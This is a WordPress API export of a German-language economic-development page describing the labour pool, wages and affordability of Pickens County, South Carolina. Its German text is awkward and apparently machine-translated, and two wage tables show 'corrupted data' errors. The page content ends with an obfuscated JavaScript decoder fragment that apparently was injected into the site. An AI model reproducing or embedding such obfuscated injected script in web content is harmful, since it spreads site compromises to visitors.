{"id":6648,"date":"2020-10-28T14:30:39","date_gmt":"2020-10-28T14:30:39","guid":{"rendered":"http:\/\/alliancepickens.com\/erschwinglichkeit\/"},"modified":"2020-10-28T14:30:42","modified_gmt":"2020-10-28T14:30:42","slug":"erschwinglichkeit","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/","title":{"rendered":"Erschwinglichkeit"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Einleitung<\/h2>\n<p>Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>Verf\u00fcgbarkeit<\/h2>\n<p>Mit mehr als 400.000 Besch\u00e4ftigten im Arbeitskr\u00e4ftebereich des Landkreises haben neue und bestehende Unternehmen Zugang zu einer gro\u00dfen und vielf\u00e4ltigen Gruppe potenzieller Mitarbeiter. South Carolina genie\u00dft stabile Arbeitgeber-Arbeitnehmer-Beziehungen als Einrecht auf Arbeit und Arbeits-zu-Will-Zustand. Unternehmen, die expandieren oder in die Region verlagern m\u00f6chten, werden von einem qualitativ hochwertigen Arbeitskr\u00e4ftepool profitieren, der von wettbewerbsf\u00e4higen L\u00f6hnen und niedrigem Gewerkschaftsniveau gepr\u00e4gt ist.<\/p>\n<p>Der Arbeitskr\u00e4ftepool ergibt sich aus der Arbeitslosigkeit und Unterbesch\u00e4ftigung von den Prozents\u00e4tzen der f\u00fcnf (5) Pendler im haupterwerbsf\u00e4higen Alter (zwischen f\u00fcnfundzwanzig (25) und f\u00fcnfundf\u00fcnfzig (54), wie das US-B\u00fcro f\u00fcr Arbeitsstatistik mitteilte.[\/vc_column_text][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602084461637\" class=\"tableauPlaceholder\"><a href=\"#\"><img decoding=\"async\" alt=\" \" src=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" style=\"border: none\"><\/a>   <\/div>\n<p> var divElement = document.getElementById(&#8216;viz1602084461637&#8217;); var vizElement = divElement.getElementsByTagName(&#8216;object&#8217;)[0]; vizElement.style.width=&#8217;1015px&#8217;;vizElement.style.height=&#8217;750px&#8217;; var scriptElement = document.createElement(&#8216;script&#8217;); scriptElement.src = &#8216;https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js&#8217;; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; bg_type=&#8221;bg_color&#8221; bg_color_value=&#8221;#e3e3e3&#8243; css=&#8221;.vc_custom_1602106944486{padding-top: 50px !important;padding-bottom: 50px !important;}&#8221; el_class=&#8221;greybar&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106834271{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Arbeitslosigkeit<\/h3>\n<p>Aufgrund der F\u00e4higkeit und soliden Arbeitsmoral seiner Bewohner ist die <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11618\">Arbeitslosenquote<\/a> im Pickens County eine der niedrigsten im Staat. Aktuelle Informationen finden Sie auf der SC DEW Website.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106840509{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Unterbesch\u00e4ftigung<\/h3>\n<p>Pickens County-Unternehmen haben auch Zugang zu einer Reihe potenzieller Mitarbeiter, die derzeit einen Arbeitsplatz haben, aber <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11624\">\u00fcber die Ausbildung, Erfahrung und Ausbildung verf\u00fcgen, <\/a>die sie f\u00fcr einen besseren Job qualifiziert.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106846938{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Erwerbsbeteiligung<\/h3>\n<p>Die Erwerbsbeteiligung ist die Zahl der Personen, die sich um eine Stelle bewerben oder eine Stelle aus\u00fcben.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106856497{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Pendelmuster<\/h3>\n<p>Pickens County Unternehmen haben den zus\u00e4tzlichen Vorteil, qualifizierte Mitarbeiter aus <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11639\">der ganzen Region<\/a>zu gewinnen.[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602085046029\" class=\"tableauPlaceholder\"><a href=\"#\"><img decoding=\"async\" alt=\" \" src=\"https:\/\/public.tableau.com\/static\/images\/Pk\/Pk_LABOR_initial_review\/CurrentLaborForce\/1_rss.png\" style=\"border: none\"><\/a>   <\/div>\n<p> var divElement = document.getElementById(&#8216;viz1602085046029&#8217;); var vizElement = divElement.getElementsByTagName(&#8216;object&#8217;)[0]; if ( divElement.offsetWidth &gt; 800 ) { vizElement.style.width=&#8217;1100px&#8217;;vizElement.style.height=&#8217;750px&#8217;;} else if ( divElement.offsetWidth &gt; 500 ) { vizElement.style.width=&#8217;1100px&#8217;;vizElement.style.height=&#8217;750px&#8217;;} else { vizElement.style.minWidth=&#8217;1100px&#8217;;vizElement.style.maxWidth=&#8217;100%&#8217;;vizElement.style.height=&#8217;1500px&#8217;;} var scriptElement = document.createElement(&#8216;script&#8217;); scriptElement.src = &#8216;https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js&#8217;; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>Erschwinglichkeit<\/h2>\n<p>[\/vc_column_text]<div id=\"advanced-tabs-desc-wrap-6890\" class=\"ult_tabs \" style=\" \" data-tabsstyle=\"style1\"\n data-titlebg=\"#03795b\" data-titlecolor=\"#ffffff\" data-fullheight=\"off\"\n data-titlehoverbg=\"#1d2c68\" data-titlehovercolor=\"#ffffff\"\n data-rotatetabs=\"0\" data-responsivemode=\"Both\" data-animation=\"Slide-Horizontal\"\ndata-activetitle=\"#ffffff\" data-activeicon=\"#ffffff\" data-activebg=\"#1d2c68\"  data-respmode=\"Tabs\" data-respwidth=\"400\" data-scroll = \"on\" data-activeindex=\"1\"><ul id=advanced-tabs-wrap-7477 class=\"ult_tabmenu style1 \" style=\"\"><li class=\"ult_tab_li   \" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\" style=\"background-color:#03795b;border-color:transparent;border-width:0px;border-style:solid;border-top-left-radius:0px;\">\n\t\t\t\t\t<a href=\"#1602110866916-4\" id=\"1602110866916-4\" style=\"color:#ffffff;;  \" class=\"ult_a \">\n\t\t\t\t\t   <span class=\"ult_tab_main  Both \">\n\t\t\t\t\t    <span class=\"ult_tab_section\">\n\t\t\t\t\t  \t\t<span  data-ultimate-target='#advanced-tabs-wrap-7477 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult-responsive\" style=\"\">L\u00f6hne: Alle Sektoren<\/span>\n\t\t\t\t\t\t   \t<span class=\"aio-icon none ult_tab_iconright\" style=\"color:#ffffff;font-size:15px;\">\n\t\t\t\t\t\t   \t<i class=\" icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t\t   <\/span>\n\t\t\t\t\t\t<\/span>\n\t\t\t\t\t   <\/span>\n\n\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/li><li class=\"ult_tab_li   \" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\" style=\"background-color:#03795b;border-color:transparent;border-width:0px;border-style:solid;border-top-right-radius:0px;\">\n\t\t\t\t\t<a href=\"#1602110866976-8\" id=\"1602110866976-8\" style=\"color:#ffffff;;  \" class=\"ult_a \">\n\t\t\t\t\t   <span class=\"ult_tab_main  Both \">\n\t\t\t\t\t    <span class=\"ult_tab_section\">\n\t\t\t\t\t  \t\t<span  data-ultimate-target='#advanced-tabs-wrap-7477 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult-responsive\" style=\"\">L\u00f6hne im verarbeitenden Gewerbe<\/span>\n\t\t\t\t\t\t   \t<span class=\"aio-icon none ult_tab_iconright\" style=\"color:#ffffff;font-size:15px;\">\n\t\t\t\t\t\t   \t<i class=\" icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t\t   <\/span>\n\t\t\t\t\t\t<\/span>\n\t\t\t\t\t   <\/span>\n\n\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/li><\/ul><div  data-ultimate-target='#advanced-tabs-desc-wrap-6890 .ult_tabcontent .ult_tab_min_contain  p'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}' class=\"ult_tabcontent ult-responsive style1\" style=\"color:#74777b;\"><div class=\"ult_tab_min_contain \" >\n\t\t\t<div  class=\"ult_tabitemname\"  >\n\t\t\t\t[vc_column_text]Die Erschwinglichkeit der lokalen Arbeitskr\u00e4fte in allen Branchen erm\u00f6glicht es neuen und expandierenden Unternehmen in verschiedenen Branchen, Top-Talente zu erheblichen Kosteneinsparungen zu rekrutieren.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c1\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t<\/div>\n\t\t\t<div  class=\"ult_tabitemname\"  >\n\t\t\t\t[vc_column_text]Angesichts wachsender Bedenken hinsichtlich der Produktion im Ausland, wie steigende Arbeitskosten, steigende Transportkosten und schlechte Produktionsqualit\u00e4t, macht Pickens Countys <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=16111\">erschwingliche und qualifizierte Fertigungsarbeitskr\u00e4fte<\/a> das Gebiet zu einem idealen Standort f\u00fcr Unternehmen, die Expansion, Verlagerung oder Reshoring in Betracht ziehen.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c2\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t<\/div><\/div><\/div><\/div><div class=\"ult_acord advanced-tabs-desc-wrap-6890\">\n   <div class=\"ult-tabto-accordion \" style=\"width:;\"\n    data-titlecolor=\"#ffffff\"  data-titlebg=\"#03795b\"\n     data-titlehoverbg=\"#1d2c68\" data-titlehovercolor=\"#ffffff\" data-animation=\"Slide-Horizontal\"\n     data-activetitle=\"#ffffff\" data-activeicon=\"#ffffff\" data-activebg=\"#1d2c68\" data-scroll = \"on\" data-activeindex=\"1\" >\n     <dl><dt class=\"\">\n        \t<a class=\"ult-tabto-actitle withBorder ult_a\" id=\"1602110866916-4\" style=\"color:#ffffff;;background-color:#03795b;border-bottom-color:transparent;border-bottom-width:0px;border-bottom-style:solid;\" href=\"#1602110866916-4\">\n        \t\t<i class=\"accordion-icon\"><\/i>\n        \t\t\t<span class=\"ult_tab_main ult_ac_mainBoth\">\n\t\t\t\t\t   <span  data-ultimate-target='#advanced-tabs-wrap-7477 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult_acordian-text ult-responsive\" style=\";color:inherit \" >L\u00f6hne: Alle Sektoren<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t   <div class=\"aio-icon none \" style=\"color:#ffffff;font-size:15px;\" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\">\n\t\t\t\t\t   <i class=\"  icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t   <\/div>\n\t\t\t\t\t<\/a><\/dt>\n            \t\t<dd class=\"ult-tabto-accordionItem ult-tabto-accolapsed\">\n\t\t\t            <div class=\"ult-tabto-acontent\" style=\"color:#74777b;\">\n\t\t\t               [vc_column_text]Die Erschwinglichkeit der lokalen Arbeitskr\u00e4fte in allen Branchen erm\u00f6glicht es neuen und expandierenden Unternehmen in verschiedenen Branchen, Top-Talente zu erheblichen Kosteneinsparungen zu rekrutieren.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c1\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t            <\/div>\n        \t<\/dd><dt class=\"\">\n        \t<a class=\"ult-tabto-actitle withBorder ult_a\" id=\"1602110866976-8\" style=\"color:#ffffff;;background-color:#03795b;border-bottom-color:transparent;border-bottom-width:0px;border-bottom-style:solid;border-bottom-color:transparent;border-bottom-width:0px;border-bottom-style:solid;\" href=\"#1602110866976-8\">\n        \t\t<i class=\"accordion-icon\"><\/i>\n        \t\t\t<span class=\"ult_tab_main ult_ac_mainBoth\">\n\t\t\t\t\t   <span  data-ultimate-target='#advanced-tabs-wrap-7477 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult_acordian-text ult-responsive\" style=\";color:inherit \" >L\u00f6hne im verarbeitenden Gewerbe<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t   <div class=\"aio-icon none \" style=\"color:#ffffff;font-size:15px;\" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\">\n\t\t\t\t\t   <i class=\"  icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t   <\/div>\n\t\t\t\t\t<\/a><\/dt>\n            \t\t<dd class=\"ult-tabto-accordionItem ult-tabto-accolapsed\">\n\t\t\t            <div class=\"ult-tabto-acontent\" style=\"color:#74777b;\">\n\t\t\t               [vc_column_text]Angesichts wachsender Bedenken hinsichtlich der Produktion im Ausland, wie steigende Arbeitskosten, steigende Transportkosten und schlechte Produktionsqualit\u00e4t, macht Pickens Countys <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=16111\">erschwingliche und qualifizierte Fertigungsarbeitskr\u00e4fte<\/a> das Gebiet zu einem idealen Standort f\u00fcr Unternehmen, die Expansion, Verlagerung oder Reshoring in Betracht ziehen.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c2\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t            <\/div>\n        \t<\/dd>\n    \t<\/dl>\n    <!--<div class=\"extraborder\" style=\"background-color:#1d2c68\"><\/div>-->\n<\/div>\n\n<\/div>[\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h2>Need Subheadline<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Einleitung Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] Verf\u00fcgbarkeit Mit mehr als&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8354,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6648","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Erschwinglichkeit - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Erschwinglichkeit - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Einleitung Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] Verf\u00fcgbarkeit Mit mehr als&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-10-28T14:30:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/\",\"name\":\"Erschwinglichkeit - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"datePublished\":\"2020-10-28T14:30:39+00:00\",\"dateModified\":\"2020-10-28T14:30:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/#primaryimage\",\"url\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"contentUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/erschwinglichkeit\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gesch\u00e4ftsklima\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Erschwinglichkeit\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Erschwinglichkeit - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/","og_locale":"de_DE","og_type":"article","og_title":"Erschwinglichkeit - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Einleitung Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] Verf\u00fcgbarkeit Mit mehr als&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-10-28T14:30:42+00:00","og_image":[{"url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/","url":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/","name":"Erschwinglichkeit - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/#primaryimage"},"thumbnailUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","datePublished":"2020-10-28T14:30:39+00:00","dateModified":"2020-10-28T14:30:42+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/#primaryimage","url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","contentUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/erschwinglichkeit\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Gesch\u00e4ftsklima","item":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/"},{"@type":"ListItem","position":3,"name":"Erschwinglichkeit"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6648","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6648"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6648\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8354"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6648"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}